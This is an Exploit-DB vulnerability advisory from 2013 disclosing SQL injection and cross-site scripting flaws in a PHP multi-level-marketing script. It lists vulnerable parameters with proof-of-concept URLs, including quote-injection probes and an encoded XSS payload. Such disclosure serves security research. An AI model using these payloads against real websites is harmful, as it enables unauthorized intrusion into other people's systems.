MLM (Multi Level Marketing) Script - Multiple Vulnerabilities

EDB-ID:

27009

CVE:

EDB Verified:

Author:

3spi0n

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2013-07-22

Vulnerable App:

##################################################################################
  _____                 _       _   _                _____           
 |  __ \               | |     | | (_)              / ____|          
 | |__) |_____   _____ | |_   _| |_ _  ___  _ __   | (___   ___  ___ 
 |  _  // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   \___ \ / _ \/ __|
 | | \ \  __/\ V / (_) | | |_| | |_| | (_) | | | |  ____) |  __/ (__ 
 |_|  \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
                                                                                                                                        
##################################################################################																
MLM (Multi Level Marketing) Script, Multiple Vulnerabilities
Product Page: http://www.mlmscript.in/

Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################

[1] SQL Injection Vulnerabilities on Demo Site

[+] (productview.php, prdid Param)
>>> http://server/product/version2/productview.php?prdid='1

[+] (productview.php, uid param)
>>> http://server/product/version2/profileview.php?uid='1

[2] Xss (Cross Site Scripting) Vulnerability on Demo Site

[+] (regcheck_email.php, email param)
>>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services